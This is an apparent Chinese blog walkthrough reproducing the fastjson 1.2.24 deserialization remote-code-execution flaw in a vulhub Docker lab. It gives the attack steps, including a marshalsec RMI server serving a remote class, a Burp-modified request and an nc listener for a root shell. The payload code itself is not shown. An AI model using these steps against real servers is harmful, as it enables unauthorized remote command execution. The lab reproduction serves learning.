fastjson 1.2.24-rce漏洞复现

fastjson 1.2.24-rce漏洞复现详解

一:1.2.24-rce漏洞原理:反序列化漏洞,导致任意命令执行漏洞。

二:前置环境:

        1:kali虚拟机,安装好docker ,进入fastjson 文件中,进行安装靶场docker-compose up -d。

        2:主机有java 1.8版本的,javac python环境。

        3:虚拟机和主机可以相互ping通。

三:实验步骤:

        1: 进到docker/vulhub-master/fastjson/1.2.24-rce 中 下载镜像 docker-compose up -d  ,docker  ps 查看端口开放情况。

        web页面 虚拟机IP+端口 查看json格式输出

2:在主机创建shell.java文件。。

3:在cmd中执行 java shell.java ,会生成shell.class 文件

4:在主机开启python 远程操控。

5:利用marshalsec工具(需要maven环境编译),或者直接下载marshalsec-0.0.3-SNAPSHOT-all.jar 链接: https://pan.baidu.com/s/1pDaDDKWD1VmTAmlnQMB-6Q?pwd=rv7u 提取码: rv7u

7:在marshalse 文件中 打开cmd  输入 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://ip:8888/#TouchFile 2335(启动RMI服务器,监听2335端口,远程执行shell.class) 

(这里注意一点,和python 远程执行的端口是一致的)

8:抓包Burp 抓取web页面的包。

9:将抓到的包发送到重放器里,进行修改POST 提交内容(注意IP要修改正确

10:利用NC工具, 实现nc  -lvvp 12345 监听

11:发送包,实现监听。

12:成功获得root权限,执行ls 

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值